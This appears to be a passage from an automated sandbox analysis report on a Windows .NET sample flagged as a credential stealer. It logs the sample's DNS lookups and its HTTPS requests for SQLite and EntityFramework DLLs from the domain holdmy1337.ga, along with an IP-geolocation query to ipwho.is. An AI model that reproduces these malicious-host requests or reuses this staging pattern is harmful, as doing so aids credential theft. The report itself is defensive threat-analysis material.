Jul 13, 2022 06:20:47.414551973 CEST	443	49759	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.417434931 CEST	49759	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.417493105 CEST	443	49759	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.549200058 CEST	443	49759	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.549357891 CEST	443	49759	188.114.96.3	192.168.2.5
Jul 13, 2022 06:20:47.550031900 CEST	49759	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:47.551134109 CEST	49759	443	192.168.2.5	188.114.96.3
Jul 13, 2022 06:20:48.775672913 CEST	49765	443	192.168.2.5	136.243.172.101
Jul 13, 2022 06:20:48.775712013 CEST	443	49765	136.243.172.101	192.168.2.5
Jul 13, 2022 06:20:48.775803089 CEST	49765	443	192.168.2.5	136.243.172.101
Jul 13, 2022 06:20:48.776513100 CEST	49765	443	192.168.2.5	136.243.172.101
Jul 13, 2022 06:20:48.776530027 CEST	443	49765	136.243.172.101	192.168.2.5
Jul 13, 2022 06:20:48.861736059 CEST	443	49765	136.243.172.101	192.168.2.5
Jul 13, 2022 06:20:48.861856937 CEST	49765	443	192.168.2.5	136.243.172.101
Jul 13, 2022 06:20:48.865031004 CEST	49765	443	192.168.2.5	136.243.172.101
Jul 13, 2022 06:20:48.865044117 CEST	443	49765	136.243.172.101	192.168.2.5
Jul 13, 2022 06:20:48.865276098 CEST	443	49765	136.243.172.101	192.168.2.5
Jul 13, 2022 06:20:48.867708921 CEST	49765	443	192.168.2.5	136.243.172.101
Jul 13, 2022 06:20:48.893956900 CEST	443	49765	136.243.172.101	192.168.2.5
Jul 13, 2022 06:20:48.894053936 CEST	443	49765	136.243.172.101	192.168.2.5
Jul 13, 2022 06:20:48.894200087 CEST	49765	443	192.168.2.5	136.243.172.101
Jul 13, 2022 06:20:48.900077105 CEST	49765	443	192.168.2.5	136.243.172.101

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 13, 2022 06:20:45.330967903 CEST	59661	53	192.168.2.5	8.8.8.8
Jul 13, 2022 06:20:45.649893999 CEST	53	59661	8.8.8.8	192.168.2.5
Jul 13, 2022 06:20:48.741257906 CEST	53757	53	192.168.2.5	8.8.8.8
Jul 13, 2022 06:20:48.771157980 CEST	53	53757	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 13, 2022 06:20:45.330967903 CEST	192.168.2.5	8.8.8.8	0x6141	Standard query (0)	holdmy1337.ga	A (IP address)	IN (0x0001)
Jul 13, 2022 06:20:48.741257906 CEST	192.168.2.5	8.8.8.8	0x56c3	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jul 13, 2022 06:20:45.649893999 CEST	8.8.8.8	192.168.2.5	0x6141	No error (0)	holdmy1337.ga	188.114.96.3	A (IP address)	IN (0x0001)
Jul 13, 2022 06:20:45.649893999 CEST	8.8.8.8	192.168.2.5	0x6141	No error (0)	holdmy1337.ga	188.114.97.3	A (IP address)	IN (0x0001)
Jul 13, 2022 06:20:48.771157980 CEST	8.8.8.8	192.168.2.5	0x56c3	No error (0)	ipwho.is	136.243.172.101	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

holdmy1337.ga

ipwho.is

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49751	188.114.96.3	443	C:\Users\user\Desktop\dBvNa2pTbj.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-13 04:20:46 UTC	0	OUT	GET /assets/dll/Ionic.Zip.dll HTTP/1.1 Host: holdmy1337.ga Connection: Keep-Alive
2022-07-13 04:20:46 UTC	0	IN	HTTP/1.1 403 Forbidden Date: Wed, 13 Jul 2022 04:20:46 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RdnGRD1Gff6EJxZ%2FPmVbfBF6u8DRG7hKTNicZi%2F75lP2psYXR5XLNdBOePYko22idIS5qCzOdIWIWdcKbfBv%2BFBWKEtS9UU5340WpkZEn1XFv76N%2Fn4Eushv9YTp4oC3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 729f3a5cab789c00-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-07-13 04:20:46 UTC	0	IN	Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20 Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
2022-07-13 04:20:46 UTC	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49752	188.114.96.3	443	C:\Users\user\Desktop\dBvNa2pTbj.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-13 04:20:46 UTC	1	OUT	GET /assets/dll/EntityFramework.dll HTTP/1.1 Host: holdmy1337.ga
2022-07-13 04:20:46 UTC	1	IN	HTTP/1.1 403 Forbidden Date: Wed, 13 Jul 2022 04:20:46 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MNmrc2sZmN8znbOriV2fmJZxcHLxd0d9wWLSWd6krtqlpwCn9Yl1q0WrvPWjAs%2FWXYgixGG%2FbIht7Y0c%2BCnVd1f5p82wmV71zW%2FFcz5f%2BRs1zEAjPTwFrzz%2BRqog63KB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 729f3a5dfd1369a3-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-07-13 04:20:46 UTC	1	IN	Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20 Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
2022-07-13 04:20:46 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49753	188.114.96.3	443	C:\Users\user\Desktop\dBvNa2pTbj.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-13 04:20:46 UTC	2	OUT	GET /assets/dll/EntityFramework.SqlServer.dll HTTP/1.1 Host: holdmy1337.ga
2022-07-13 04:20:46 UTC	2	IN	HTTP/1.1 403 Forbidden Date: Wed, 13 Jul 2022 04:20:46 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LjXQl57cA4%2F6dF4cETbFWY%2F4dNp2yBM562bgDdk%2FBMq4e5P6Y0k4bEbJ%2F%2FJNnVV5iPZhfbIJ%2B8mpqCFdpUSxlAff80E9d7D24Bk18UtC8LBnBrpbUl3hwwY3fPa45%2BUM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 729f3a5f0e8d8fdd-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-07-13 04:20:46 UTC	2	IN	Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20 Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
2022-07-13 04:20:46 UTC	3	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49754	188.114.96.3	443	C:\Users\user\Desktop\dBvNa2pTbj.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-13 04:20:46 UTC	3	OUT	GET /assets/dll/System.Data.SQLite.dll HTTP/1.1 Host: holdmy1337.ga
2022-07-13 04:20:46 UTC	3	IN	HTTP/1.1 403 Forbidden Date: Wed, 13 Jul 2022 04:20:46 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G74D7K65x6MO7hvmX52vMqg7Yoo2eBcD6VtJEYqHN8cyznApMIp8nDFW3zU6Ko6z437bl5g06fuO94vI7K5EF%2FIEXZ%2FGDJwMO3kvqBMWogMpuMT98JfGHJYPyywCeJD1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 729f3a6018e59b8f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-07-13 04:20:46 UTC	3	IN	Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20 Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
2022-07-13 04:20:46 UTC	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49756	188.114.96.3	443	C:\Users\user\Desktop\dBvNa2pTbj.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-13 04:20:46 UTC	4	OUT	GET /assets/dll/System.Data.SQLite.EF6.dll HTTP/1.1 Host: holdmy1337.ga
2022-07-13 04:20:46 UTC	4	IN	HTTP/1.1 403 Forbidden Date: Wed, 13 Jul 2022 04:20:46 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kZ%2FYZnv%2F58ow6idhGhK3hGeCvZAVvdl%2FMDDH9lIvFHgfEDqRiSQ%2FNWhMUPG7Elo2IsCMbL5BzlZdIHfG0UrQYItlD1K%2B4qQNJrSbONF0ngME74nhonPsPICAToz1K3b5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 729f3a60edb8909c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-07-13 04:20:46 UTC	4	IN	Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20 Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
2022-07-13 04:20:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49757	188.114.96.3	443	C:\Users\user\Desktop\dBvNa2pTbj.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-13 04:20:47 UTC	5	OUT	GET /assets/dll/System.Data.SQLite.Linq.dll HTTP/1.1 Host: holdmy1337.ga
2022-07-13 04:20:47 UTC	5	IN	HTTP/1.1 403 Forbidden Date: Wed, 13 Jul 2022 04:20:47 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MIEjGYMh7ZMbaY6M7TJZ%2F5nlqZnNO4FhK5yZ8cPuAjfWwmMM7ylvcevS5bHLmh06iFqdDI%2Brt0y5WIGj2r0CKLSHXC7QAyCX9rIRoueqF49mMxryRVxvRUT176AAAFxw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 729f3a620bf6bb8f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-07-13 04:20:47 UTC	6	IN	Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20 Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
2022-07-13 04:20:47 UTC	6	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49758	188.114.96.3	443	C:\Users\user\Desktop\dBvNa2pTbj.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-13 04:20:47 UTC	6	OUT	GET /assets/dll/x86/SQLite.Interop.dll HTTP/1.1 Host: holdmy1337.ga
2022-07-13 04:20:47 UTC	6	IN	HTTP/1.1 403 Forbidden Date: Wed, 13 Jul 2022 04:20:47 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z0PB9Cx3FfEPpYDL1D8eOtKTi0Ma5yQeA6UsjNwo6q7RKvW4z1TVkob37uL0WfFVdnv8gsYY5TL69HY0OBj2ICSMmcZNSIwpTM6wBXYYBsGv6WeFWLtAQFKRgMyb8BB1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 729f3a635b209bf4-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-07-13 04:20:47 UTC	7	IN	Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20 Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
2022-07-13 04:20:47 UTC	7	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49759	188.114.96.3	443	C:\Users\user\Desktop\dBvNa2pTbj.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-13 04:20:47 UTC	7	OUT	GET /assets/dll/x64/SQLite.Interop.dll HTTP/1.1 Host: holdmy1337.ga
2022-07-13 04:20:47 UTC	7	IN	HTTP/1.1 403 Forbidden Date: Wed, 13 Jul 2022 04:20:47 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A9gMCjWMzZvPKB7qd5b5rmk38GSs4%2FVK75C44pp0rZLAsia2bLN9QXNvmp6LlGKIBxDTcqqzcj9i%2BaF6n9lMZJiQ2BKRaPuuoW46ER4GZOrQ6w2klPhSBK0gTIvB7sfg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 729f3a647a896910-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-07-13 04:20:47 UTC	8	IN	Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 6c 64 6d 79 31 33 33 37 2e 67 61 20 50 6f 72 74 20 Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at holdmy1337.ga Port
2022-07-13 04:20:47 UTC	8	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49765	136.243.172.101	443	C:\Users\user\Desktop\dBvNa2pTbj.exe

Timestamp	kBytes transferred	Direction	Data
2022-07-13 04:20:48 UTC	8	OUT	GET /?output=xml HTTP/1.1 Host: ipwho.is Connection: Keep-Alive
2022-07-13 04:20:48 UTC	8	IN	HTTP/1.1 200 OK Date: Wed, 13 Jul 2022 04:20:48 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close Server: ipwhois X-Powered-By: python Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2022-07-13 04:20:48 UTC	8	IN	Data Raw: 33 39 31 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 34 2e 31 37 2e 35 32 2e 31 34 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 45 75 72 6f 70 65 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 45 55 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 53 77 69 74 7a 65 72 6c 61 6e 64 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 43 48 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 5a 75 72 69 63 68 3c 2f 72 65 67 69 6f 6e Data Ascii: 391<?xml version="1.0" encoding="UTF-8"?><query><ip>84.17.52.14</ip><success>1</success><type>IPv4</type><continent>Europe</continent><continent_code>EU</continent_code><country>Switzerland</country><country_code>CH</country_code><region>Zurich</region

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: dBvNa2pTbj.exePID: 6272, Parent PID: 4916

General

Target ID:	0
Start time:	06:20:43
Start date:	13/07/2022
Path:	C:\Users\user\Desktop\dBvNa2pTbj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dBvNa2pTbj.exe"
Imagebase:	0xae0000
File size:	429568 bytes
MD5 hash:	628E04A5C298A35BD396B74A42D237FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: dBvNa2pTbj.exePID: 6272, Parent PID: 4916COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	53
Total number of Limit Nodes:	0

Executed Functions

Function 0B398540 Relevance: 24.7, Strings: 19, Instructions: 954COMMON

Download Yara Rule

Strings

